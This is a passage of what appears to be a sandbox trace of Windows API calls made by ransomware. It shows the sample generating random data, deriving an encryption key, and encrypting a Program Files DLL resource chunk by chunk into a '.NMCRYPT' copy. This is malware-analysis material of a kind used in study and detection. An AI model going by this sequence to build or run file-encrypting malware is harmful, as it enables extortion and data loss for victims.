hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.932] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0152.932] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0152.933] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0152.933] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0152.933] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad1b8) returned 1 [0152.933] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0152.933] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0152.933] wcslen (_String="\\\\?\\") returned 0x4 [0152.933] CryptDuplicateKey (in: hKey=0x9ad1b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad8b8) returned 1 [0152.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0152.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0152.933] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=3584) returned 1 [0152.933] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0152.934] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.010] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.010] GetLastError () returned 0x0 [0153.010] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.011] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.011] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.011] GetLastError () returned 0x0 [0153.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.012] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.012] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.012] GetLastError () returned 0x0 [0153.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.012] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.012] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.012] GetLastError () returned 0x0 [0153.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.012] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.012] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.012] GetLastError () returned 0x0 [0153.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.012] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.012] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.012] GetLastError () returned 0x0 [0153.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.012] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.012] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.012] GetLastError () returned 0x0 [0153.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.012] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.012] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.012] GetLastError () returned 0x0 [0153.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.013] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.013] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.013] GetLastError () returned 0x0 [0153.013] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 